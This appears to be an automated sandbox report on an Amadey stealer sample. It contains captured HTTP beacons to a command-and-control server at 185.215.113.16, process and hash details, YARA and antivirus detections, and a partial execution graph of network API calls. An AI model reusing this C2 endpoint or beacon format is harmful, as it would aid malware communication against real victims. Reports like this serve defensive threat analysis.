                    Sep 27, 2024 03:08:03.056969881 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:03.283761978 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.656685185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:08:03.419090986 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:04.127178907 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.656686185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:08:04.136584997 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:05.043207884 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    58192.168.2.656687185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:08:05.156019926 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:05.853718042 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.656688185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:08:05.921688080 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:06.695524931 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.656689185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:08:06.809837103 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:07.508126974 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:08:07.514189959 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:08:07.740587950 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.656690185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:08:08.016844988 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:08:08.741755962 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:08:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:1
                    Start time:21:06:03
                    Start date:26/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x820000
                    File size:1'877'504 bytes
                    MD5 hash:5E8202D139D4F31CF0637105BFB93FCC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.2236057072.0000000000821000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.2195484295.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:21:06:06
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0x6d0000
                    File size:1'877'504 bytes
                    MD5 hash:5E8202D139D4F31CF0637105BFB93FCC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2221928235.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2262405635.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 50%, ReversingLabs
                    • Detection: 53%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:3
                    Start time:21:06:06
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x6d0000
                    File size:1'877'504 bytes
                    MD5 hash:5E8202D139D4F31CF0637105BFB93FCC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2272371089.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2231966463.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:8
                    Start time:21:07:00
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x6d0000
                    File size:1'877'504 bytes
                    MD5 hash:5E8202D139D4F31CF0637105BFB93FCC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.2759333528.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Executed Functions

                      Function 050C01A1 Relevance: .0, Instructions: 29COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.2238305965.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_50c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01515fb228ffc36a3c9da8fb71ecf075787e07a8294c4bed4ee553ddc3ae05fb
                      • Instruction ID: 0f065f77ae2f4bc8082e5da6e269fc77d369e0f98ec2ca51babeb85388baf6e3
                      • Opcode Fuzzy Hash: 01515fb228ffc36a3c9da8fb71ecf075787e07a8294c4bed4ee553ddc3ae05fb
                      • Instruction Fuzzy Hash: 91E0CDE389D566FC1247D284397D5BD9C0F529767073D40ED5C079B541E2844C42C0A6
                      Function 050C021D Relevance: .1, Instructions: 105COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.2238305965.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_50c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fb81a35e6db30a046c11ab4222c6b382bc2d4d642bf71edaacd52e5d1d239c3c
                      • Instruction ID: a7af70ae52b82dcf1b99bd9cd73489e54754b02fdba364ff658969969a431206
                      • Opcode Fuzzy Hash: fb81a35e6db30a046c11ab4222c6b382bc2d4d642bf71edaacd52e5d1d239c3c
                      • Instruction Fuzzy Hash: DB11BEEB18D024FD7602D281BAB8AFF6F6ED1C7770331849AF847C5406D2951E8AE132
                      Function 050C026D Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.2238305965.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_50c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 73bc848c3c973b810f9ce19ffffff14718acb7bb0c860607d3a9c3fb0e8c957d
                      • Instruction ID: 1f3ba84aedef046c7f755f5d4bf996156b6e5e2b33cae0e5030d49bdd2b9b094
                      • Opcode Fuzzy Hash: 73bc848c3c973b810f9ce19ffffff14718acb7bb0c860607d3a9c3fb0e8c957d
                      • Instruction Fuzzy Hash: 5701E8EB149021BDB152D2817F2CEFFAB6DE1C6770730886BF403D1445D6891E9AA132
                      Function 050C024B Relevance: .1, Instructions: 74COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.2238305965.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_50c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 32227d6dd5b8ef47a62568b3e9e6c8a7bdda0c98cc5890005845f0183d5da129
                      • Instruction ID: b2f2dc84d9a73a9b9caf82bcccc10d73929b6b69a1dd3777e95075de1d28e956
                      • Opcode Fuzzy Hash: 32227d6dd5b8ef47a62568b3e9e6c8a7bdda0c98cc5890005845f0183d5da129
                      • Instruction Fuzzy Hash: EC012CFB149014FD7252D6827B28EFEAB2DE1C6770735846BF403D5845D2851A9DA132
                      Function 050C029A Relevance: .0, Instructions: 44COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.2238305965.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_50c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6dece470322c07b6b7ce400dde333fea835cbaf2a37d4bc423c14ca520f514fe
                      • Instruction ID: 8a618653b39039a5f6fc8746eead5ce3dfdd4f29dc93cf517ee95f2f49a19715
                      • Opcode Fuzzy Hash: 6dece470322c07b6b7ce400dde333fea835cbaf2a37d4bc423c14ca520f514fe
                      • Instruction Fuzzy Hash: 54E0A0E7049020FEB152C7823A28EFFAB2DE0C3334330841BF003C0002D2850A59E632
                      Function 050C02C7 Relevance: .0, Instructions: 44COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.2238305965.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_50c0000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9a2cc0c28f3cfcc253fa506ab329d4604840440633f2cab6b0873278c31f9584
                      • Instruction ID: 0cb73cdf31a194bfbe782c4f75da423024085c952dd68cacd827f93f2e86b738
                      • Opcode Fuzzy Hash: 9a2cc0c28f3cfcc253fa506ab329d4604840440633f2cab6b0873278c31f9584
                      • Instruction Fuzzy Hash: 33E01AEB18A014BD7161C2427F28AFF9B6DD2C2B70330C92BF402D2442D2891A8EA031

                      Execution Graph

                      Execution Coverage:11.2%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:5.2%
                      Total number of Nodes:559
                      Total number of Limit Nodes:28
                      execution_graph 13341 706974 13342 706982 13341->13342 13343 70698c 13341->13343 13344 7068bd 4 API calls 13343->13344 13345 7069a6 ___free_lconv_mon 13344->13345 13508 6eb7e9 13509 6eb6e5 11 API calls 13508->13509 13510 6eb811 Concurrency::details::_Reschedule_chore 13509->13510 13513 6eb836 13510->13513 13515 6ecade 13510->13515 13512 6eb648 11 API calls 13514 6eb84e 13512->13514 13513->13512 13516 6ecafc 13515->13516 13517 6ecaec TpCallbackUnloadDllOnCompletion 13515->13517 13516->13513 13517->13516 13346 706559 13347 7063f7 __fassign 2 API calls 13346->13347 13348 70656a 13347->13348 13097 6d7400 13098 6d7435 shared_ptr 13097->13098 13102 6d752f shared_ptr 13098->13102 13103 6ed041 13098->13103 13100 6d75bd 13100->13102 13107 6ecff7 13100->13107 13105 6ed052 13103->13105 13104 6ed05a 13104->13100 13105->13104 13111 6ed0c9 13105->13111 13108 6ed007 13107->13108 13109 6ed0af 13108->13109 13110 6ed0ab RtlWakeAllConditionVariable 13108->13110 13109->13102 13110->13102 13112 6ed0d7 SleepConditionVariableCS 13111->13112 13114 6ed0f0 13111->13114 13112->13114 13114->13105 13153 6e6ae0 13154 6e6b10 13153->13154 13157 6e46c0 13154->13157 13156 6e6b5c Sleep 13156->13154 13160 6e46fb 13157->13160 13172 6e4a72 shared_ptr 13157->13172 13158 6e4e69 shared_ptr 13158->13156 13160->13172 13176 6dbd60 13160->13176 13162 6e4f25 shared_ptr 13163 6e4fee shared_ptr 13162->13163 13167 6e6ab6 13162->13167 13195 6d7d00 13163->13195 13165 6e4ffd 13201 6d82b0 13165->13201 13169 6e46c0 11 API calls 13167->13169 13168 6e4a0d 13170 6dbd60 5 API calls 13168->13170 13168->13172 13171 6e6b5c Sleep 13169->13171 13170->13172 13171->13167 13172->13158 13187 6d65b0 13172->13187 13173 6e4753 shared_ptr __dosmaperr 13173->13168 13174 708979 4 API calls 13173->13174 13174->13168 13175 6e5016 shared_ptr 13175->13156 13177 6dbdb2 13176->13177 13179 6dc14e shared_ptr 13176->13179 13178 6dbdc6 InternetOpenW InternetConnectA 13177->13178 13177->13179 13180 6dbe3d 13178->13180 13179->13173 13181 6dbe53 HttpOpenRequestA 13180->13181 13182 6dbe71 shared_ptr 13181->13182 13183 6dbf13 HttpSendRequestA 13182->13183 13186 6dbf2b shared_ptr 13183->13186 13184 6dbfb3 InternetReadFile 13185 6dbfda 13184->13185 13186->13184 13188 6d660f 13187->13188 13205 6d2280 13188->13205 13190 6d6699 shared_ptr 13191 6d2280 4 API calls 13190->13191 13192 6d6822 shared_ptr 13190->13192 13193 6d6727 shared_ptr 13191->13193 13192->13162 13193->13192 13194 6d2280 4 API calls 13193->13194 13194->13193 13197 6d7d66 shared_ptr __cftof 13195->13197 13196 6d7ea3 GetNativeSystemInfo 13198 6d7ea7 13196->13198 13197->13196 13197->13198 13200 6d7eb8 shared_ptr 13197->13200 13198->13200 13289 708a81 13198->13289 13200->13165 13202 6d8315 shared_ptr __cftof 13201->13202 13203 6d8454 GetNativeSystemInfo 13202->13203 13204 6d8333 13202->13204 13203->13204 13204->13175 13208 6d2240 13205->13208 13209 6d2256 13208->13209 13212 708667 13209->13212 13215 707456 13212->13215 13214 6d2264 13214->13190 13216 707496 13215->13216 13220 70747e __cftof __dosmaperr 13215->13220 13217 70683a __fassign 4 API calls 13216->13217 13216->13220 13218 7074ae 13217->13218 13221 707a11 13218->13221 13220->13214 13223 707a22 13221->13223 13222 707a31 __cftof __dosmaperr 13222->13220 13223->13222 13228 707fb5 13223->13228 13233 707c0f 13223->13233 13238 707c35 13223->13238 13248 707d83 13223->13248 13229 707fc5 13228->13229 13230 707fbe 13228->13230 13229->13223 13257 70799d 13230->13257 13232 707fc4 13232->13223 13234 707c18 13233->13234 13235 707c1f 13233->13235 13236 70799d 4 API calls 13234->13236 13235->13223 13237 707c1e 13236->13237 13237->13223 13239 707c56 __cftof __dosmaperr 13238->13239 13241 707c3c 13238->13241 13239->13223 13240 707db6 13246 707dc4 13240->13246 13247 707dd8 13240->13247 13265 70808e 13240->13265 13241->13239 13241->13240 13243 707def 13241->13243 13241->13246 13243->13247 13261 7081dd 13243->13261 13246->13247 13269 708537 13246->13269 13247->13223 13249 707db6 13248->13249 13250 707d9c 13248->13250 13251 70808e 4 API calls 13249->13251 13255 707dc4 13249->13255 13256 707dd8 13249->13256 13250->13249 13252 707def 13250->13252 13250->13255 13251->13255 13253 7081dd 4 API calls 13252->13253 13252->13256 13253->13255 13254 708537 4 API calls 13254->13256 13255->13254 13255->13256 13256->13223 13258 7079af __dosmaperr 13257->13258 13259 708979 4 API calls 13258->13259 13260 7079d2 __dosmaperr 13259->13260 13260->13232 13263 7081f8 13261->13263 13262 70822a 13262->13246 13263->13262 13273 70c65f 13263->13273 13266 7080a7 13265->13266 13276 70d199 13266->13276 13268 70815a 13268->13246 13270 7085aa 13269->13270 13272 708554 13269->13272 13270->13247 13271 70c65f __cftof 4 API calls 13271->13272 13272->13270 13272->13271 13274 70c504 __cftof GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13273->13274 13275 70c677 13274->13275 13275->13262 13277 70d1a9 __cftof __dosmaperr 13276->13277 13278 70d1bf 13276->13278 13277->13268 13278->13277 13279 70d256 13278->13279 13280 70d25b 13278->13280 13281 70d2b5 13279->13281 13282 70d27f 13279->13282 13283 70c9b0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13280->13283 13286 70ccc9 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13281->13286 13284 70d284 13282->13284 13285 70d29d 13282->13285 13283->13277 13287 70d00f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13284->13287 13288 70ceb3 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13285->13288 13286->13277 13287->13277 13288->13277 13290 7086d7 4 API calls 13289->13290 13291 708a9f 13290->13291 13291->13200 13349 6ea140 13350 6ea1c0 13349->13350 13356 6e7040 13350->13356 13352 6ea1fc shared_ptr 13353 6ea3ee shared_ptr 13352->13353 13360 6d3ea0 13352->13360 13355 6ea3d6 13357 6e7081 __cftof __Mtx_init_in_situ 13356->13357 13358 6e72b6 13357->13358 13366 6d2e80 13357->13366 13358->13352 13361 6d3ede 13360->13361 13362 6d3f08 13360->13362 13361->13355 13363 6d3f18 13362->13363 13413 6d2bc0 13362->13413 13363->13355 13367 6d2f3e GetCurrentThreadId 13366->13367 13368 6d2ec6 13366->13368 13369 6d2f54 13367->13369 13370 6d2faf 13367->13370 13371 6ec5dc GetSystemTimePreciseAsFileTime 13368->13371 13369->13370 13376 6ec5dc GetSystemTimePreciseAsFileTime 13369->13376 13370->13358 13372 6d2ed2 13371->13372 13373 6d2fde 13372->13373 13377 6d2edd __Mtx_unlock 13372->13377 13374 6ec19a 10 API calls 13373->13374 13375 6d2fe4 13374->13375 13378 6ec19a 10 API calls 13375->13378 13379 6d2f79 13376->13379 13377->13375 13380 6d2f2f 13377->13380 13378->13379 13381 6ec19a 10 API calls 13379->13381 13382 6d2f80 __Mtx_unlock 13379->13382 13380->13367 13380->13370 13381->13382 13383 6ec19a 10 API calls 13382->13383 13384 6d2f98 __Cnd_broadcast 13382->13384 13383->13384 13384->13370 13385 6ec19a 10 API calls 13384->13385 13386 6d2ffc 13385->13386 13387 6ec5dc GetSystemTimePreciseAsFileTime 13386->13387 13396 6d3040 shared_ptr __Mtx_unlock 13387->13396 13388 6d3185 13389 6ec19a 10 API calls 13388->13389 13390 6d318b 13389->13390 13391 6ec19a 10 API calls 13390->13391 13392 6d3191 13391->13392 13393 6ec19a 10 API calls 13392->13393 13394 6d3153 __Mtx_unlock 13393->13394 13395 6ec19a 10 API calls 13394->13395 13397 6d3167 13394->13397 13398 6d319d 13395->13398 13396->13388 13396->13390 13396->13397 13399 6d30f2 GetCurrentThreadId 13396->13399 13397->13358 13399->13397 13400 6d30fb 13399->13400 13400->13397 13401 6ec5dc GetSystemTimePreciseAsFileTime 13400->13401 13402 6d311f 13401->13402 13402->13388 13402->13392 13402->13394 13404 6ebc7c 13402->13404 13407 6ebaa2 13404->13407 13406 6ebc8c 13406->13402 13408 6ebacc 13407->13408 13409 6ece9b _xtime_get GetSystemTimePreciseAsFileTime 13408->13409 13412 6ebad4 __Xtime_diff_to_millis2 13408->13412 13410 6ebaff __Xtime_diff_to_millis2 13409->13410 13411 6ece9b _xtime_get GetSystemTimePreciseAsFileTime 13410->13411 13410->13412 13411->13412 13412->13406 13414 6d2bce 13413->13414 13420 6eb777 13414->13420 13416 6d2c02 13417 6d2c09 13416->13417 13426 6d2c40 13416->13426 13417->13355 13419 6d2c18 std::_Xinvalid_argument 13421 6eb784 13420->13421 13425 6eb7a3 Concurrency::details::_Reschedule_chore 13420->13425 13429 6ecaa7 13421->13429 13423 6eb794 13423->13425 13431 6eb74e 13423->13431 13425->13416 13437 6eb72b 13426->13437 13428 6d2c72 shared_ptr 13428->13419 13430 6ecac2 CreateThreadpoolWork 13429->13430 13430->13423 13432 6eb757 Concurrency::details::_Reschedule_chore 13431->13432 13435 6eccfc 13432->13435 13434 6eb771 13434->13425 13436 6ecd11 TpPostWork 13435->13436 13436->13434 13438 6eb747 13437->13438 13439 6eb737 13437->13439 13438->13428 13439->13438 13441 6ec9a8 13439->13441 13442 6ec9bd TpReleaseWork 13441->13442 13442->13438 13443 6e8700 13444 6e875a __cftof 13443->13444 13450 6e9ae0 13444->13450 13446 6e8784 13449 6e879c 13446->13449 13454 6d43b0 13446->13454 13448 6e8809 std::_Throw_future_error 13451 6e9b15 13450->13451 13460 6d2ca0 13451->13460 13453 6e9b46 13453->13446 13455 6ebe0f InitOnceExecuteOnce 13454->13455 13456 6d43ca 13455->13456 13457 6d43d1 13456->13457 13458 706beb 9 API calls 13456->13458 13457->13448 13459 6d43e4 13458->13459 13461 6d2cdd 13460->13461 13462 6ebe0f InitOnceExecuteOnce 13461->13462 13463 6d2d06 13462->13463 13464 6d2d11 13463->13464 13465 